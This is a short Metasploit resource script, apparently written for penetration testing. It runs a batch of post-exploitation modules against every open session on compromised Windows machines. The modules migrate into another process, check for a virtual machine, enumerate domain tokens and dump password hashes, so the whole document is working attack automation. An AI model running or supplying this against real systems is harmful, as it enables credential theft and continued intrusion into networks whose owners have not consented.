<ruby>
modules = ["post/windows/manage/smart_migrate","post/windows/gather/checkvm","post/windows/gather/enum_domain_tokens","post/windows/gather/smart_hashdump",]
#"post/windows/gather/cachedump"

sessions = []
framework.sessions.each do |session|
  sessions << session
end
modules.each do |exec|
  self.run_single("use #{exec}")
  sessions.each do |ses|
    self.run_single("set SESSION #{ses[0]}")
    self.run_single("use #{exec}")
    puts ("\nRunning #{exec}")
    self.run_single("run")
  end
end
</ruby>

